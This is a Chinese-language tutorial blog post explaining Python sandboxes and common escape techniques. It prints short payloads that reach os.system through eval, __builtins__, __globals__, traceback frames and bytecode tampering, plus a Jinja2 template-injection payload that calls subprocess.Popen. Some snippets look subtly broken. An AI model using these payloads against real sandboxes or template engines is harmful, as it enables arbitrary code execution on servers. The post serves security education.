今天我們來聊一個有趣的話題 - Python沙箱越獄。在我們開始之前，先來搞清楚什麽是Python沙箱吧。

簡單來，Python沙箱就像是一個虛擬的"遊樂場"。在這個遊樂場裏，你可以盡情地玩耍(運行Python代碼)，但是不能傷害到外面的世界（不能訪問系統資源或執行危險操作）。這個"遊樂場"有圍欄（限制），有規則（安全策略），目的就是讓你玩得開心，又不會搞出什麽大亂子。

除了在線編程平台，Python沙箱在很多地方都有應用。比如在一些需要執行不受信任代碼的場景中，如插件系統、科學計算環境等。總之，只要是需要在保證安全的前提下運行未知代碼的地方，都可能會用到Python沙箱。

Python沙箱的工作原理

現在我們知道了Python沙箱是什麽，那它是怎麽工作的呢？

首先，Python解釋器本身就有一些內置的安全特性。比如，它會阻止直接訪問底層系統資源，限制某些危險操作的執行。但是，這些內置的安全機制還遠遠不夠，因爲Python的靈活性使得總能找到繞過這些限制的方法。

所以，我們需要更強大的沙箱。常見的Python沙箱的功能主要有以下幾種：

代碼分析：在執行之前，對代碼進行靜態分析，檢查是否包含危險操作。這就像是安檢，在你進入遊樂場之前，先檢查你是否攜帶了危險物品。環境隔離：創建一個受限的Python環境，只允許訪問安全的函數和模塊。這就像是把遊樂場裏的某些區域封鎖起來，你只能玩允許的項目。系統調用攔截：攔截並控制程序對操作系統的調用。這就像是在遊樂場裏安排了保安，監控每個人的行爲。虛擬化：使用虛擬機或容器技術，在一個完全隔離的環境中運行代碼。這就像是創建了一個虛擬的遊樂場，無論你在裏面做什麽，都不會影響到真實世界。Python沙箱越獄的概念

說了這麽多沙箱，現在終于要說到今天的主角 —— 沙箱越獄了！

所謂沙箱越獄，就是設法突破沙箱的限制，執行本不被允許的操作。就像是聰明的小朋友想方設法爬出遊樂場的圍欄，去外面的世界探險。

沙箱越獄可能帶來嚴重的安全隱患。如果惡意用戶成功越獄，他們可能會：

訪問或修改服務器上的敏感文件執行危險的系統命令發起網絡攻擊獲取其他用戶的私密信息常見的Python沙箱越獄技術

1. 利用內建函數

Python有很多強大的內建函數，可能會成爲沙箱越獄的工具。比如：

eval() 和 exec()：這兩個函數可以執行字符串形式的Python代碼。如果沙箱沒有正確地限制這些函數，攻擊者可能會利用它們執行任意代碼。import()：這個函數可以動態地導入模塊。如果沒有proper限制，攻擊者可能會導入一些危險的模塊。

例子:

# 利用eval()執行系統命令eval("__import__('os').system('ls')")

2. 利用模塊導入

即使沙箱限制了直接導入模塊，聰明的攻擊者可能會找到間接導入的方法。比如：

利用__builtins__：Python的內建命名空間中包含了很多有用的函數和類，包括__import__函數。利用已導入模塊的屬性：有些看似無害的模塊可能包含了可以用來導入其他模塊的方法。

例子：

# 利用__builtins__導入os模塊__builtins__.__import__('os').system('ls')

3. 利用代碼注入

有時候，沙箱可能允許用戶輸入一些看似安全的代碼片段，但攻擊者可能會巧妙地構造這些代碼片段，使其包含惡意代碼。

例子:

# 假設沙箱允許定義函數def harmless_function(): # 看似無害的注釋 """).__getattribute__.__globals__['__builtins__']['__import__']('os').system('ls')#""" pass# 利用exec執行注釋中的代碼exec(harmless_function.__doc__)

下面是對這個例子的詳細剖析：

詳細剖析

函數定義：def harmless_function(): # 看似無害的注釋 """).__getattribute__.__globals__['__builtins__']['__import__']('os').system('ls')#""" passharmless_function是一個普通的函數。函數體內有一個多行字符串（文檔字符串，或稱docstring），在Python中，文檔字符串通常用于提供函數的描述。這個文檔字符串包含了一個看似注釋的內容，實際卻是一個惡意代碼。惡意代碼解析：""").__getattribute__.__globals__['__builtins__']['__import__']('os').system('ls')#"""""")：這是一個字符串結束標記，它關閉了docstring。.__getattribute__：獲取對象的屬性，在這裏獲取的是函數對象的屬性。.__globals__：訪問函數的全局命名空間。['__builtins__']：訪問全局命名空間中的內建模塊。['__import__']('os')：使用內建的__import__函數導入os模塊。.system('ls')：調用os模塊的system函數執行系統命令ls，列出當前目錄的文件。

4. 利用反射機制

Python的反射機制允許程序在運行時檢查、訪問和修改自身的狀態和行爲。攻擊者可能會利用這一特性來訪問或修改本應受限的對象。

例子：

# 利用反射修改類的方法class Safe: def __init__(self): self.value = 42safe = Safe()getattr(safe.__class__, '__init__').__globals__['__builtins__']['__import__']('os').system('ls')

5. 利用字節碼操作

Python代碼在執行前會被編譯成字節碼。有些高級的攻擊者可能會直接操作字節碼來繞過沙箱的限制。

例子：

import typesdef safe_function(): print("I'm safe!")# 修改函數的字節碼unsafe_code = types.CodeType( 0, 0, 0, 0, 0, 0, bytes([0x64, 0x00, 0x00, 0x53]), # 等同于 return __import__('os') (), (), (), "", "", 0, b'')safe_function.__code__ = unsafe_coderesult = safe_function()result.system('ls')經典Python沙箱越獄案例分析

讓我們來看兩個真實的Python沙箱越獄案例，看看這些技術是如何在實際中運用的。

案例1：PyPy沙箱越獄

PyPy是一個Python的替代實現，它也提供了一個沙箱模式。但在2012年，有研究者發現了一種巧妙的方法來逃逸這個沙箱。

技術原理：

PyPy的沙箱阻止了對__builtin__模塊的直接訪問。但是，異常對象的__traceback__屬性可以用來獲取棧幀。通過棧幀，可以訪問到全局命名空間，從而獲取__builtin__。

示例代碼：

try: raise Exceptionexcept: tb = sys.exc_info()[2] frame = tb.tb_frame frame.f_globals['__builtins__']['__import__']('os').system('ls')

案例2：Jinja2模板注入

Jinja2是一個流行的Python模板引擎，它也提供了沙箱模式。但如果配置不當，仍然可能被攻擊者利用。

技術原理：

Jinja2的沙箱默認阻止了大多數危險操作。但是，某些看似無害的操作(如獲取對象屬性)是允許的。攻擊者可以通過巧妙構造模板，一步步獲取到可執行任意代碼的能力。

示例代碼：

{{''.__class__.__mro__[1].__subclasses__()[XXX]('ls', shell=True, stdout=-1)}}

這段代碼通過獲取字符串對象的類,然後獲取其基類，最後找到可以執行系統命令的子類(通常是subprocess.Popen)，從而執行系統命令。

總結

通過本文，我們了解了Python沙箱的概念、工作原理，以及各種沙箱越獄的技術。這些知識不僅能幫助我們更好地理解Python的安全機制，也能讓我們在設計和實現安全系統時更加謹慎。

作者：大鯨魚crush鏈接：https://juejin.cn/post/7383982728734425125